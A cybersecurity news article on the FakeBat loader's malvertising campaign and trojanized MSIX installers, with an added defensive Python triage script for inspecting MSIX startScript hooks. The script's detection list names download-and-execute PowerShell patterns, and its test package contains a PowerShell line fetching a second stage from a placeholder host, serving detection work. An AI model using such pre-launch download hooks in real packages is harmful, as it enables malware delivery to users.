New Surge in Malware Infections Linked to FakeBat Loader
Cybersecurity experts have reported a notable increase in malware infections attributable to malvertising campaigns that deploy a loader known as FakeBat. This malicious software targets individuals seeking popular business applications, a strategy that appears to be opportunistically designed to ensnare unsuspecting users. According to a technical report from the Mandiant Managed Defense team, the complexity of the attack lies in the use of a trojanized MSIX installer, which runs a PowerShell script tasked with downloading additional malicious payloads.
FakeBat, also referred to as EugenLoader or PaykLoader, is tied to a threat group identified as Eugenfest. The threat intelligence unit at Google is tracking this malware variant as NUMOZYLOD and attributes its operation to a sophisticated malware-as-a-service enterprise known as UNC4536.
The distribution mechanism of FakeBat relies heavily on drive-by downloads, funneling users searching for legitimate software to counterfeit websites that host the trojanized MSIX installers. Payloads delivered by FakeBat span a range of known malware families, including IcedID, RedLine Stealer, Lumma Stealer, SectopRAT, and Carbanak, the last of which is associated with the financially motivated cybercriminal organization FIN7.
Mandiant’s findings further reveal that UNC4536’s methodology leverages malvertising techniques to disseminate trojanized installers masquerading as trusted applications, including notable names like Brave, KeePass, Notion, Steam, and Zoom. The sites hosting these deceptive installers are designed to closely resemble legitimate software distribution pages, effectively tricking users into downloading harmful content.
A notable feature of this attack is its use of MSIX installers, which can execute a script before the main application launches through a configuration option known as startScript. This lets the loader gain a foothold on the host and deliver the secondary payloads of the attackers' business partners.
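The startScript hook lives in the Package Support Framework's config.json inside the MSIX archive, which is an ordinary ZIP file. The following triage script, added here as an example and not code from the Mandiant report, lists every application that declares a startScript, notes whether the script is configured to run outside the MSIX container, and scans the referenced script for download-and-execute patterns; the sample package it builds is constructed for the test and is not a real FakeBat artifact.

```python
import io
import json
import re
import zipfile

# Download/execute patterns that a pre-launch install script should not need.
SUSPICIOUS = [r"Invoke-WebRequest", r"Invoke-RestMethod", r"DownloadString",
              r"DownloadFile", r"Net\.WebClient", r"\bIEX\b", r"Invoke-Expression",
              r"-EncodedCommand"]

def triage_msix(data: bytes) -> list[dict]:
    """Return one finding per application whose PSF config.json declares a startScript.
    MSIX is a ZIP; the PSF runs startScript.scriptPath before the main executable."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = {n.lower(): n for n in z.namelist()}
        if "config.json" not in names:
            return findings
        cfg = json.loads(z.read(names["config.json"]))
        for app in cfg.get("applications", []):
            hook = app.get("startScript")
            if not hook:
                continue
            script = hook.get("scriptPath", "")
            body = z.read(names[script.lower()]).decode("utf-8", "replace") \
                if script.lower() in names else ""
            findings.append({
                "app": app.get("id"),
                "script": script,
                # PSF defaults runInVirtualEnvironment to true; false means the
                # script executes on the host rather than inside the container.
                "outside_container": hook.get("runInVirtualEnvironment", True) is False,
                "indicators": sorted(p for p in SUSPICIOUS if re.search(p, body, re.I)),
            })
    return findings

def build_sample() -> bytes:
    """Constructed lookalike package for testing; not a real FakeBat artifact."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("config.json", json.dumps({"applications": [{
            "id": "KEEPASS", "executable": "VFS/ProgramFilesX64/KeePass.exe",
            "startScript": {"scriptPath": "StartingScript.ps1",
                            "runInVirtualEnvironment": False, "showWindow": False}}]}))
        z.writestr("StartingScript.ps1",
                   "Invoke-WebRequest -Uri 'https://example.invalid/stage2' "
                   "-OutFile \"$env:TEMP\\s.dat\"\n")
    return buf.getvalue()
```

Point `triage_msix` at the bytes of any downloaded `.msix` to review its pre-launch hooks before the package is trusted.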
Beyond simply distributing malware, FakeBat is a pivotal tool in the arsenal of UNC4536, which operates primarily as a malware distributor, ensuring that its partners, including the FIN7 group, have a delivery channel for their next-stage payloads.
Research indicates that NUMOZYLOD functions by collecting critical system information, such as the operating system version, domain affiliation, and installed antivirus software. In certain variants, the malware collects the host’s public IPv4 and IPv6 addresses, transmitting this data back to its command and control infrastructure. The malware also maintains persistence by creating shortcuts in the system’s Startup folder.
This heightened threat landscape follows closely on the heels of an earlier report from Mandiant detailing another malware downloader known as EMPTYSPACE. This previous malware variant has been linked to financially motivated threat actors engaging in data exfiltration and cryptojacking targeting specific sectors within Italy.
Business owners must remain alert to the implications of these findings and consider strengthening their cybersecurity measures. The tactics employed in these attacks align with techniques cataloged in the MITRE ATT&CK framework, including initial access through trojanized installers posing as legitimate software, persistence through the creation of startup entries, and potential privilege escalation via the delivered malware payloads.
As the cybersecurity climate continues to evolve, vigilance, education, and preparedness are crucial for protecting sensitive information against increasingly sophisticated threats.
Source link: https://thehackernews.com/2024/08/cybercriminals-exploit-popular-software.html